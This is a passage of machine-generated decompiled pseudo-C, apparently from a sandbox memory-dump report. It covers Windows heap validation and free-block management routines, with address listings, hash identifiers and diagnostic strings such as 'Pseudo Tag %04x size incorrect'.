                                                                                                                          						_t282 = 0;
                                                                                                                          						_v24 = 0;
                                                                                                                          						_v36 = 0;
                                                                                                                          						__eflags = _t327 - _t261;
                                                                                                                          						if(_t327 == _t261) {
                                                                                                                          							L53:
                                                                                                                          							_t328 = _v32;
                                                                                                                          							_v28 = _t331;
                                                                                                                          							__eflags = _t328 - _t184;
                                                                                                                          							if(_t328 == _t184) {
                                                                                                                          								__eflags = _t331[0x1d] - _t282;
                                                                                                                          								if(_t331[0x1d] == _t282) {
                                                                                                                          									__eflags = _v12;
                                                                                                                          									if(_v12 == 0) {
                                                                                                                          										L82:
                                                                                                                          										_t267 = 1;
                                                                                                                          										__eflags = 1;
                                                                                                                          										goto L83;
                                                                                                                          									}
                                                                                                                          									_t329 = _t331[0x2f];
                                                                                                                          									__eflags = _t329;
                                                                                                                          									if(_t329 == 0) {
                                                                                                                          										L77:
                                                                                                                          										_t330 = _t331[0x22];
                                                                                                                          										__eflags = _t330;
                                                                                                                          										if(_t330 == 0) {
                                                                                                                          											L81:
                                                                                                                          											_t129 =  &_v16;
                                                                                                                          											 *_t129 = _v16 & 0x00000000;
                                                                                                                          											__eflags =  *_t129;
                                                                                                                          											E009F174B( &_v12,  &_v16, 0x8000);
                                                                                                                          											goto L82;
                                                                                                                          										}
                                                                                                                          										_t314 = _t331[0x21] & 0x0000ffff;
                                                                                                                          										_t285 = 1;
                                                                                                                          										__eflags = 1 - _t314;
                                                                                                                          										if(1 >= _t314) {
                                                                                                                          											goto L81;
                                                                                                                          										} else {
                                                                                                                          											goto L79;
                                                                                                                          										}
                                                                                                                          										while(1) {
                                                                                                                          											L79:
                                                                                                                          											_t330 = _t330 + 0x40;
                                                                                                                          											_t332 = _t285 & 0x0000ffff;
                                                                                                                          											_t262 = _v20 + _t332 * 4;
                                                                                                                          											__eflags =  *_t262 -  *((intOrPtr*)(_t330 + 8));
                                                                                                                          											if( *_t262 !=  *((intOrPtr*)(_t330 + 8))) {
                                                                                                                          												break;
                                                                                                                          											}
                                                                                                                          											_t285 = _t285 + 1;
                                                                                                                          											__eflags = _t285 - _t314;
                                                                                                                          											if(_t285 < _t314) {
                                                                                                                          												continue;
                                                                                                                          											}
                                                                                                                          											goto L81;
                                                                                                                          										}
                                                                                                                          										_t191 =  *[fs:0x30];
                                                                                                                          										__eflags =  *(_t191 + 0xc);
                                                                                                                          										if( *(_t191 + 0xc) == 0) {
                                                                                                                          											_push("HEAP: ");
                                                                                                                          											E009CB150();
                                                                                                                          										} else {
                                                                                                                          											E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                          										}
                                                                                                                          										_push(_t262);
                                                                                                                          										_push( *((intOrPtr*)(_v20 + _t332 * 4)));
                                                                                                                          										_t148 = _t330 + 0x10; // 0x10
                                                                                                                          										_push( *((intOrPtr*)(_t330 + 8)));
                                                                                                                          										E009CB150("Tag %04x (%ws) size incorrect (%Ix != %Ix) %p\n", _t332);
                                                                                                                          										L59:
                                                                                                                          										_t270 = 0;
                                                                                                                          										__eflags = 0;
                                                                                                                          										goto L60;
                                                                                                                          									}
                                                                                                                          									_t289 = 1;
                                                                                                                          									__eflags = 1;
                                                                                                                          									while(1) {
                                                                                                                          										_t201 = _v12;
                                                                                                                          										_t329 = _t329 + 0xc;
                                                                                                                          										_t263 = _t289 & 0x0000ffff;
                                                                                                                          										__eflags =  *((intOrPtr*)(_t201 + _t263 * 4)) -  *((intOrPtr*)(_t329 + 8));
                                                                                                                          										if( *((intOrPtr*)(_t201 + _t263 * 4)) !=  *((intOrPtr*)(_t329 + 8))) {
                                                                                                                          											break;
                                                                                                                          										}
                                                                                                                          										_t289 = _t289 + 1;
                                                                                                                          										__eflags = _t289 - 0x81;
                                                                                                                          										if(_t289 < 0x81) {
                                                                                                                          											continue;
                                                                                                                          										}
                                                                                                                          										goto L77;
                                                                                                                          									}
                                                                                                                          									_t203 =  *[fs:0x30];
                                                                                                                          									__eflags =  *(_t203 + 0xc);
                                                                                                                          									if( *(_t203 + 0xc) == 0) {
                                                                                                                          										_push("HEAP: ");
                                                                                                                          										E009CB150();
                                                                                                                          									} else {
                                                                                                                          										E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                          									}
                                                                                                                          									_t291 = _v12;
                                                                                                                          									_push(_t291 + _t263 * 4);
                                                                                                                          									_push( *((intOrPtr*)(_t291 + _t263 * 4)));
                                                                                                                          									_push( *((intOrPtr*)(_t329 + 8)));
                                                                                                                          									E009CB150("Pseudo Tag %04x size incorrect (%Ix != %Ix) %p\n", _t263);
                                                                                                                          									goto L59;
                                                                                                                          								}
                                                                                                                          								_t212 =  *[fs:0x30];
                                                                                                                          								__eflags =  *(_t212 + 0xc);
                                                                                                                          								if( *(_t212 + 0xc) == 0) {
                                                                                                                          									_push("HEAP: ");
                                                                                                                          									E009CB150();
                                                                                                                          								} else {
                                                                                                                          									E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                          								}
                                                                                                                          								_push(_t331[0x1d]);
                                                                                                                          								_push(_v36);
                                                                                                                          								_push("Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)\n");
                                                                                                                          								L58:
                                                                                                                          								E009CB150();
                                                                                                                          								goto L59;
                                                                                                                          							}
                                                                                                                          							_t220 =  *[fs:0x30];
                                                                                                                          							__eflags =  *(_t220 + 0xc);
                                                                                                                          							if( *(_t220 + 0xc) == 0) {
                                                                                                                          								_push("HEAP: ");
                                                                                                                          								E009CB150();
                                                                                                                          							} else {
                                                                                                                          								E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                          							}
                                                                                                                          							_push(_t328);
                                                                                                                          							_push(_v24);
                                                                                                                          							_push("Number of free blocks in arena (%ld) does not match number in the free lists (%ld)\n");
                                                                                                                          							goto L58;
                                                                                                                          						} else {
                                                                                                                          							goto L50;
                                                                                                                          						}
                                                                                                                          						while(1) {
                                                                                                                          							L50:
                                                                                                                          							_t92 = _t327 - 0x10; // -24
                                                                                                                          							_t282 = _t331;
                                                                                                                          							_t230 = E00A84AEF(_t331, _t92, _t331,  &_v24,  &_v36,  &_v28, _v20, _v12);
                                                                                                                          							__eflags = _t230;
                                                                                                                          							if(_t230 == 0) {
                                                                                                                          								goto L59;
                                                                                                                          							}
                                                                                                                          							_t327 =  *_t327;
                                                                                                                          							__eflags = _t327 - _t261;
                                                                                                                          							if(_t327 != _t261) {
                                                                                                                          								continue;
                                                                                                                          							}
                                                                                                                          							_t184 = _v24;
                                                                                                                          							_t282 = _v36;
                                                                                                                          							goto L53;
                                                                                                                          						}
                                                                                                                          						goto L59;
                                                                                                                          					} else {
                                                                                                                          						while(1) {
                                                                                                                          							_t39 = _t326 + 0x18; // 0x10
                                                                                                                          							_t264 = _t39;
                                                                                                                          							if(_t331[0x13] != 0) {
                                                                                                                          								_t319 = _t331[0x14] ^  *_t264;
                                                                                                                          								 *_t264 = _t319;
                                                                                                                          								_t303 = _t319 >> 0x00000010 ^ _t319 >> 0x00000008 ^ _t319;
                                                                                                                          								_t348 = _t319 >> 0x18 - _t303;
                                                                                                                          								if(_t319 >> 0x18 != _t303) {
                                                                                                                          									_push(_t303);
                                                                                                                          									E00A7FA2B(_t264, _t331, _t264, _t326, _t331, _t348);
                                                                                                                          								}
                                                                                                                          								_t281 = 0x81;
                                                                                                                          							}
                                                                                                                          							_t317 = _v20;
                                                                                                                          							if(_t317 != 0) {
                                                                                                                          								_t241 =  *(_t326 + 0xa) & 0x0000ffff;
                                                                                                                          								_t350 = _t241;
                                                                                                                          								if(_t350 != 0) {
                                                                                                                          									if(_t350 >= 0) {
                                                                                                                          										__eflags = _t241 & 0x00000800;
                                                                                                                          										if(__eflags == 0) {
                                                                                                                          											__eflags = _t241 - _t331[0x21];
                                                                                                                          											if(__eflags < 0) {
                                                                                                                          												_t298 = _t241;
                                                                                                                          												_t65 = _t317 + _t298 * 4;
                                                                                                                          												 *_t65 =  *(_t317 + _t298 * 4) + ( *(_t326 + 0x10) >> 3);
                                                                                                                          												__eflags =  *_t65;
                                                                                                                          											}
                                                                                                                          										}
                                                                                                                          									} else {
                                                                                                                          										_t244 = _t241 & 0x00007fff;
                                                                                                                          										if(_t244 < _t281) {
                                                                                                                          											 *((intOrPtr*)(_v12 + _t244 * 4)) =  *((intOrPtr*)(_v12 + _t244 * 4)) + ( *(_t326 + 0x10) >> 3);
                                                                                                                          										}
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          							if(( *(_t326 + 0x1a) & 0x00000004) != 0 && E00A723E3(_t331, _t264) == 0) {
                                                                                                                          								break;
                                                                                                                          							}
                                                                                                                          							if(_t331[0x13] != 0) {
                                                                                                                          								_t264[0] = _t264[0] ^ _t264[0] ^  *_t264;
                                                                                                                          								 *_t264 =  *_t264 ^ _t331[0x14];
                                                                                                                          							}
                                                                                                                          							_t326 =  *_t326;
                                                                                                                          							if( &(_t331[0x27]) == _t326) {
                                                                                                                          								goto L49;
                                                                                                                          							} else {
                                                                                                                          								_t281 = 0x81;
                                                                                                                          								continue;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						__eflags = _t331[0x13];
                                                                                                                          						if(_t331[0x13] != 0) {
                                                                                                                          							 *(_t326 + 0x1b) =  *(_t326 + 0x1a) ^  *(_t326 + 0x19) ^  *(_t326 + 0x18);
                                                                                                                          							 *(_t326 + 0x18) =  *(_t326 + 0x18) ^ _t331[0x14];
                                                                                                                          						}
                                                                                                                          						goto L65;
                                                                                                                          					}
                                                                                                                          				} else {
                                                                                                                          					L83:
                                                                                                                          					return _t267;
                                                                                                                          				}
                                                                                                                          			}
                                                                                                                          0x00a84810
                                                                                                                          0x00a84812
                                                                                                                          0x00a84812
                                                                                                                          0x00a84812
                                                                                                                          0x00a84822
                                                                                                                          0x00a84822
                                                                                                                          0x00a84827
                                                                                                                          0x00a84827
                                                                                                                          0x00000000
                                                                                                                          0x00a84827
                                                                                                                          0x00a844c4
                                                                                                                          0x00a844d3
                                                                                                                          0x00a844d9
                                                                                                                          0x00a844dc
                                                                                                                          0x00a844de
                                                                                                                          0x00a844e0
                                                                                                                          0x00a84560
                                                                                                                          0x00a84520
                                                                                                                          0x00a84522
                                                                                                                          0x00a84525
                                                                                                                          0x00a84528
                                                                                                                          0x00a8452b
                                                                                                                          0x00a8452e
                                                                                                                          0x00a84530
                                                                                                                          0x00a84697
                                                                                                                          0x00a8469d
                                                                                                                          0x00a846a1
                                                                                                                          0x00a846c0
                                                                                                                          0x00a846c5
                                                                                                                          0x00a846a3
                                                                                                                          0x00a846b8
                                                                                                                          0x00a846bd
                                                                                                                          0x00a846cb
                                                                                                                          0x00a846d4
                                                                                                                          0x00a84677
                                                                                                                          0x00a84677
                                                                                                                          0x00a84679
                                                                                                                          0x00a8467c
                                                                                                                          0x00a8468a
                                                                                                                          0x00a84690
                                                                                                                          0x00a84690
                                                                                                                          0x00a847f1
                                                                                                                          0x00a847f1
                                                                                                                          0x00a847f1
                                                                                                                          0x00000000
                                                                                                                          0x00a847f1
                                                                                                                          0x00a84536
                                                                                                                          0x00a84539
                                                                                                                          0x00a8453c
                                                                                                                          0x00a84636
                                                                                                                          0x00a8463c
                                                                                                                          0x00a84640
                                                                                                                          0x00a8465f
                                                                                                                          0x00a84664
                                                                                                                          0x00a84642
                                                                                                                          0x00a84657
                                                                                                                          0x00a8465c
                                                                                                                          0x00a84670
                                                                                                                          0x00000000
                                                                                                                          0x00a84542
                                                                                                                          0x00a84542
                                                                                                                          0x00a84546
                                                                                                                          0x00a84548
                                                                                                                          0x00a8454b
                                                                                                                          0x00a84555
                                                                                                                          0x00a8455b
                                                                                                                          0x00a8455b
                                                                                                                          0x00a8455b
                                                                                                                          0x00a8455d
                                                                                                                          0x00a8455d
                                                                                                                          0x00a8455d
                                                                                                                          0x00000000
                                                                                                                          0x00a8455d
                                                                                                                          0x00a8453c
                                                                                                                          0x00a84579
                                                                                                                          0x00a8457c
                                                                                                                          0x00a84587
                                                                                                                          0x00a84589
                                                                                                                          0x00a84591
                                                                                                                          0x00a84592
                                                                                                                          0x00a84597
                                                                                                                          0x00a84598
                                                                                                                          0x00a845a1
                                                                                                                          0x00a845ab
                                                                                                                          0x00a845ab
                                                                                                                          0x00a845a1
                                                                                                                          0x00a845ae
                                                                                                                          0x00a845b4
                                                                                                                          0x00a845b9
                                                                                                                          0x00a845bd
                                                                                                                          0x00a84759
                                                                                                                          0x00a84759
                                                                                                                          0x00a8475f
                                                                                                                          0x00a84761
                                                                                                                          0x00a84763
                                                                                                                          0x00a84765
                                                                                                                          0x00a84768
                                                                                                                          0x00a8476b
                                                                                                                          0x00a8476d
                                                                                                                          0x00a8479c
                                                                                                                          0x00a8479c
                                                                                                                          0x00a8479f
                                                                                                                          0x00a847a2
                                                                                                                          0x00a847a4
                                                                                                                          0x00a84830
                                                                                                                          0x00a84833
                                                                                                                          0x00a84879
                                                                                                                          0x00a8487d
                                                                                                                          0x00a848f1
                                                                                                                          0x00a848f3
                                                                                                                          0x00a848f3
                                                                                                                          0x00000000
                                                                                                                          0x00a848f3
                                                                                                                          0x00a8487f
                                                                                                                          0x00a84885
                                                                                                                          0x00a84887
                                                                                                                          0x00a848a8
                                                                                                                          0x00a848a8
                                                                                                                          0x00a848ae
                                                                                                                          0x00a848b0
                                                                                                                          0x00a848dc
                                                                                                                          0x00a848dc
                                                                                                                          0x00a848dc
                                                                                                                          0x00a848dc
                                                                                                                          0x00a848ec
                                                                                                                          0x00000000
                                                                                                                          0x00a848ec
                                                                                                                          0x00a848b2
                                                                                                                          0x00a848bc
                                                                                                                          0x00a848be
                                                                                                                          0x00a848c1
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a848c3
                                                                                                                          0x00a848c3
                                                                                                                          0x00a848c6
                                                                                                                          0x00a848c9
                                                                                                                          0x00a848cc
                                                                                                                          0x00a848d1
                                                                                                                          0x00a848d4
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a848d6
                                                                                                                          0x00a848d7
                                                                                                                          0x00a848da
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a848da
                                                                                                                          0x00a8494f
                                                                                                                          0x00a84955
                                                                                                                          0x00a84959
                                                                                                                          0x00a84978
                                                                                                                          0x00a8497d
                                                                                                                          0x00a8495b
                                                                                                                          0x00a84970
                                                                                                                          0x00a84975
                                                                                                                          0x00a84986
                                                                                                                          0x00a84987
                                                                                                                          0x00a8498a
                                                                                                                          0x00a8498d
                                                                                                                          0x00a84997
                                                                                                                          0x00a847ef
                                                                                                                          0x00a847ef
                                                                                                                          0x00a847ef
                                                                                                                          0x00000000
                                                                                                                          0x00a847ef
                                                                                                                          0x00a84890
                                                                                                                          0x00a84890
                                                                                                                          0x00a84891
                                                                                                                          0x00a84891
                                                                                                                          0x00a84894
                                                                                                                          0x00a84897
                                                                                                                          0x00a8489d
                                                                                                                          0x00a848a0
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a848a2
                                                                                                                          0x00a848a3
                                                                                                                          0x00a848a6
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a848a6
                                                                                                                          0x00a848fb
                                                                                                                          0x00a84901
                                                                                                                          0x00a84905
                                                                                                                          0x00a84924
                                                                                                                          0x00a84929
                                                                                                                          0x00a84907
                                                                                                                          0x00a8491c
                                                                                                                          0x00a84921
                                                                                                                          0x00a8492f
                                                                                                                          0x00a84935
                                                                                                                          0x00a84936
                                                                                                                          0x00a84939
                                                                                                                          0x00a84942
                                                                                                                          0x00000000
                                                                                                                          0x00a84947
                                                                                                                          0x00a84835
                                                                                                                          0x00a8483b
                                                                                                                          0x00a8483f
                                                                                                                          0x00a8485e
                                                                                                                          0x00a84863
                                                                                                                          0x00a84841
                                                                                                                          0x00a84856
                                                                                                                          0x00a8485b

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                                                                          • API String ID: 0-1357697941
                                                                                                                          • Opcode ID: 6b5f35a32b178362b859ce8ca397d3e717c95baad7aaf5b67af7e2d5d151848d
                                                                                                                          • Instruction ID: a9cb12324bd6539d84d8cbd9a4614c165e47c4b01e74e781f6b84ef71474baf3
                                                                                                                          • Opcode Fuzzy Hash: 6b5f35a32b178362b859ce8ca397d3e717c95baad7aaf5b67af7e2d5d151848d
                                                                                                                          • Instruction Fuzzy Hash: 49F12231A00646DFCB25EFA8C495FBAB7F5FF8D704F188029E0469B681D734A985CB51
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 72%
                                                                                                                          			E009EA309(signed int __ecx, signed int __edx, signed int _a4, char _a8) {
                                                                                                                          				char _v8;
                                                                                                                          				signed short _v12;
                                                                                                                          				signed short _v16;
                                                                                                                          				signed int _v20;
                                                                                                                          				signed int _v24;
                                                                                                                          				signed short _v28;
                                                                                                                          				signed int _v32;
                                                                                                                          				signed int _v36;
                                                                                                                          				signed int _v40;
                                                                                                                          				signed int _v44;
                                                                                                                          				signed int _v48;
                                                                                                                          				unsigned int _v52;
                                                                                                                          				signed int _v56;
                                                                                                                          				void* _v60;
                                                                                                                          				intOrPtr _v64;
                                                                                                                          				void* _v72;
                                                                                                                          				void* __ebx;
                                                                                                                          				void* __edi;
                                                                                                                          				void* __ebp;
                                                                                                                          				unsigned int _t246;
                                                                                                                          				signed char _t247;
                                                                                                                          				signed short _t249;
                                                                                                                          				unsigned int _t256;
                                                                                                                          				signed int _t262;
                                                                                                                          				signed int _t265;
                                                                                                                          				signed int _t266;
                                                                                                                          				signed int _t267;
                                                                                                                          				intOrPtr _t270;
                                                                                                                          				signed int _t280;
                                                                                                                          				signed int _t286;
                                                                                                                          				signed int _t289;
                                                                                                                          				intOrPtr _t290;
                                                                                                                          				signed int _t291;
                                                                                                                          				signed int _t317;
                                                                                                                          				signed short _t320;
                                                                                                                          				intOrPtr _t327;
                                                                                                                          				signed int _t339;
                                                                                                                          				signed int _t344;
                                                                                                                          				signed int _t347;
                                                                                                                          				intOrPtr _t348;
                                                                                                                          				signed int _t350;
                                                                                                                          				signed int _t352;
                                                                                                                          				signed int _t353;
                                                                                                                          				signed int _t356;
                                                                                                                          				intOrPtr _t357;
                                                                                                                          				intOrPtr _t366;
                                                                                                                          				signed int _t367;
                                                                                                                          				signed int _t370;
                                                                                                                          				intOrPtr _t371;
                                                                                                                          				signed int _t372;
                                                                                                                          				signed int _t394;
                                                                                                                          				signed short _t402;
                                                                                                                          				intOrPtr _t404;
                                                                                                                          				intOrPtr _t415;
                                                                                                                          				signed int _t430;
                                                                                                                          				signed int _t433;
                                                                                                                          				signed int _t437;
                                                                                                                          				signed int _t445;
                                                                                                                          				signed short _t446;
                                                                                                                          				signed short _t449;
                                                                                                                          				signed short _t452;
                                                                                                                          				signed int _t455;
                                                                                                                          				signed int _t460;
                                                                                                                          				signed short* _t468;
                                                                                                                          				signed int _t480;
                                                                                                                          				signed int _t481;
                                                                                                                          				signed int _t483;
                                                                                                                          				intOrPtr _t484;
                                                                                                                          				signed int _t491;
                                                                                                                          				unsigned int _t506;
                                                                                                                          				unsigned int _t508;
                                                                                                                          				signed int _t513;
                                                                                                                          				signed int _t514;
                                                                                                                          				signed int _t521;
                                                                                                                          				signed short* _t533;
                                                                                                                          				signed int _t541;
                                                                                                                          				signed int _t543;
                                                                                                                          				signed int _t546;
                                                                                                                          				unsigned int _t551;
                                                                                                                          				signed int _t553;
                                                                                                                          
                                                                                                                          				_t450 = __ecx;
                                                                                                                          				_t553 = __ecx;
                                                                                                                          				_t539 = __edx;
                                                                                                                          				_v28 = 0;
                                                                                                                          				_v40 = 0;
                                                                                                                          				if(( *(__ecx + 0xcc) ^  *0xab8a68) != 0) {
                                                                                                                          					_push(_a4);
                                                                                                                          					_t513 = __edx;
                                                                                                                          					L11:
                                                                                                                          					_t246 = E009EA830(_t450, _t513);
                                                                                                                          					L7:
                                                                                                                          					return _t246;
                                                                                                                          				}
                                                                                                                          				if(_a8 != 0) {
                                                                                                                          					__eflags =  *(__edx + 2) & 0x00000008;
                                                                                                                          					if(( *(__edx + 2) & 0x00000008) != 0) {
                                                                                                                          						 *((intOrPtr*)(__ecx + 0x230)) =  *((intOrPtr*)(__ecx + 0x230)) - 1;
                                                                                                                          						_t430 = E009EDF24(__edx,  &_v12,  &_v16);
                                                                                                                          						__eflags = _t430;
                                                                                                                          						if(_t430 != 0) {
                                                                                                                          							_t157 = _t553 + 0x234;
                                                                                                                          							 *_t157 =  *(_t553 + 0x234) - _v16;
                                                                                                                          							__eflags =  *_t157;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					_t445 = _a4;
                                                                                                                          					_t514 = _t539;
                                                                                                                          					_v48 = _t539;
                                                                                                                          					L14:
                                                                                                                          					_t247 =  *((intOrPtr*)(_t539 + 6));
                                                                                                                          					__eflags = _t247;
                                                                                                                          					if(_t247 == 0) {
                                                                                                                          						_t541 = _t553;
                                                                                                                          					} else {
                                                                                                                          						_t541 = (_t539 & 0xffff0000) - ((_t247 & 0x000000ff) << 0x10) + 0x10000;
                                                                                                                          						__eflags = _t541;
                                                                                                                          					}
                                                                                                                          					_t249 = 7 + _t445 * 8 + _t514;
                                                                                                                          					_v12 = _t249;
                                                                                                                          					__eflags =  *_t249 - 3;
                                                                                                                          					if( *_t249 == 3) {
                                                                                                                          						_v16 = _t514 + _t445 * 8 + 8;
                                                                                                                          						E009C9373(_t553, _t514 + _t445 * 8 + 8);
                                                                                                                          						_t452 = _v16;
                                                                                                                          						_v28 =  *(_t452 + 0x10);
                                                                                                                          						 *((intOrPtr*)(_t541 + 0x30)) =  *((intOrPtr*)(_t541 + 0x30)) - 1;
                                                                                                                          						_v36 =  *(_t452 + 0x14);
                                                                                                                          						 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) - ( *(_t452 + 0x14) >> 0xc);
                                                                                                                          						 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) +  *(_t452 + 0x14);
                                                                                                                          						 *((intOrPtr*)(_t553 + 0x1f8)) =  *((intOrPtr*)(_t553 + 0x1f8)) - 1;
                                                                                                                          						_t256 =  *(_t452 + 0x14);
                                                                                                                          						__eflags = _t256 - 0x7f000;
                                                                                                                          						if(_t256 >= 0x7f000) {
                                                                                                                          							_t142 = _t553 + 0x1ec;
                                                                                                                          							 *_t142 =  *(_t553 + 0x1ec) - _t256;
                                                                                                                          							__eflags =  *_t142;
                                                                                                                          							_t256 =  *(_t452 + 0x14);
                                                                                                                          						}
                                                                                                                          						_t513 = _v48;
                                                                                                                          						_t445 = _t445 + (_t256 >> 3) + 0x20;
                                                                                                                          						_a4 = _t445;
                                                                                                                          						_v40 = 1;
                                                                                                                          					} else {
                                                                                                                          						_t27 =  &_v36;
                                                                                                                          						 *_t27 = _v36 & 0x00000000;
                                                                                                                          						__eflags =  *_t27;
                                                                                                                          					}
                                                                                                                          					__eflags =  *((intOrPtr*)(_t553 + 0x54)) -  *((intOrPtr*)(_t513 + 4));
                                                                                                                          					if( *((intOrPtr*)(_t553 + 0x54)) ==  *((intOrPtr*)(_t513 + 4))) {
                                                                                                                          						_v44 = _t513;
                                                                                                                          						_t262 = E009CA9EF(_t541, _t513);
                                                                                                                          						__eflags = _a8;
                                                                                                                          						_v32 = _t262;
                                                                                                                          						if(_a8 != 0) {
                                                                                                                          							__eflags = _t262;
                                                                                                                          							if(_t262 == 0) {
                                                                                                                          								goto L19;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						__eflags =  *0xab8748 - 1;
                                                                                                                          						if( *0xab8748 >= 1) {
                                                                                                                          							__eflags = _t262;
                                                                                                                          							if(_t262 == 0) {
                                                                                                                          								_t415 =  *[fs:0x30];
                                                                                                                          								__eflags =  *(_t415 + 0xc);
                                                                                                                          								if( *(_t415 + 0xc) == 0) {
                                                                                                                          									_push("HEAP: ");
                                                                                                                          									E009CB150();
                                                                                                                          								} else {
                                                                                                                          									E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                          								}
                                                                                                                          								_push("(UCRBlock != NULL)");
                                                                                                                          								E009CB150();
                                                                                                                          								__eflags =  *0xab7bc8;
                                                                                                                          								if( *0xab7bc8 == 0) {
                                                                                                                          									__eflags = 1;
                                                                                                                          									E00A82073(_t445, 1, _t541, 1);
                                                                                                                          								}
                                                                                                                          								_t513 = _v48;
                                                                                                                          								_t445 = _a4;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						_t350 = _v40;
                                                                                                                          						_t480 = _t445 << 3;
                                                                                                                          						_v20 = _t480;
                                                                                                                          						_t481 = _t480 + _t513;
                                                                                                                          						_v24 = _t481;
                                                                                                                          						__eflags = _t350;
                                                                                                                          						if(_t350 == 0) {
                                                                                                                          							_t481 = _t481 + 0xfffffff0;
                                                                                                                          							__eflags = _t481;
                                                                                                                          						}
                                                                                                                          						_t483 = (_t481 & 0xfffff000) - _v44;
                                                                                                                          						__eflags = _t483;
                                                                                                                          						_v52 = _t483;
                                                                                                                          						if(_t483 == 0) {
                                                                                                                          							__eflags =  *0xab8748 - 1;
                                                                                                                          							if( *0xab8748 < 1) {
                                                                                                                          								goto L9;
                                                                                                                          							}
                                                                                                                          							__eflags = _t350;
                                                                                                                          							goto L146;
                                                                                                                          						} else {
                                                                                                                          							_t352 = E009F174B( &_v44,  &_v52, 0x4000);
                                                                                                                          							__eflags = _t352;
                                                                                                                          							if(_t352 < 0) {
                                                                                                                          								goto L94;
                                                                                                                          							}
                                                                                                                          							_t353 = E009E7D50();
                                                                                                                          							_t447 = 0x7ffe0380;
                                                                                                                          							__eflags = _t353;
                                                                                                                          							if(_t353 != 0) {
                                                                                                                          								_t356 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                                          							} else {
                                                                                                                          								_t356 = 0x7ffe0380;
                                                                                                                          							}
                                                                                                                          							__eflags =  *_t356;
                                                                                                                          							if( *_t356 != 0) {
                                                                                                                          								_t357 =  *[fs:0x30];
                                                                                                                          								__eflags =  *(_t357 + 0x240) & 0x00000001;
                                                                                                                          								if(( *(_t357 + 0x240) & 0x00000001) != 0) {
                                                                                                                          									E00A814FB(_t447, _t553, _v44, _v52, 5);
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          							_t358 = _v32;
                                                                                                                          							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
                                                                                                                          							_t484 =  *((intOrPtr*)(_v32 + 0x14));
                                                                                                                          							__eflags = _t484 - 0x7f000;
                                                                                                                          							if(_t484 >= 0x7f000) {
                                                                                                                          								_t90 = _t553 + 0x1ec;
                                                                                                                          								 *_t90 =  *(_t553 + 0x1ec) - _t484;
                                                                                                                          								__eflags =  *_t90;
                                                                                                                          							}
                                                                                                                          							E009C9373(_t553, _t358);
                                                                                                                          							_t486 = _v32;
                                                                                                                          							 *((intOrPtr*)(_v32 + 0x14)) =  *((intOrPtr*)(_v32 + 0x14)) + _v52;
                                                                                                                          							E009C9819(_t486);
                                                                                                                          							 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) + (_v52 >> 0xc);
                                                                                                                          							 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) - _v52;
                                                                                                                          							_t366 =  *((intOrPtr*)(_v32 + 0x14));
                                                                                                                          							__eflags = _t366 - 0x7f000;
                                                                                                                          							if(_t366 >= 0x7f000) {
                                                                                                                          								_t104 = _t553 + 0x1ec;
                                                                                                                          								 *_t104 =  *(_t553 + 0x1ec) + _t366;
                                                                                                                          								__eflags =  *_t104;
                                                                                                                          							}
                                                                                                                          							__eflags = _v40;
                                                                                                                          							if(_v40 == 0) {
                                                                                                                          								_t533 = _v52 + _v44;
                                                                                                                          								_v32 = _t533;
                                                                                                                          								_t533[2] =  *((intOrPtr*)(_t553 + 0x54));
                                                                                                                          								__eflags = _v24 - _v52 + _v44;
                                                                                                                          								if(_v24 == _v52 + _v44) {
                                                                                                                          									__eflags =  *(_t553 + 0x4c);
                                                                                                                          									if( *(_t553 + 0x4c) != 0) {
                                                                                                                          										_t533[1] = _t533[1] ^ _t533[0] ^  *_t533;
                                                                                                                          										 *_t533 =  *_t533 ^  *(_t553 + 0x50);
                                                                                                                          									}
                                                                                                                          								} else {
                                                                                                                          									_t449 = 0;
                                                                                                                          									_t533[3] = 0;
                                                                                                                          									_t533[1] = 0;
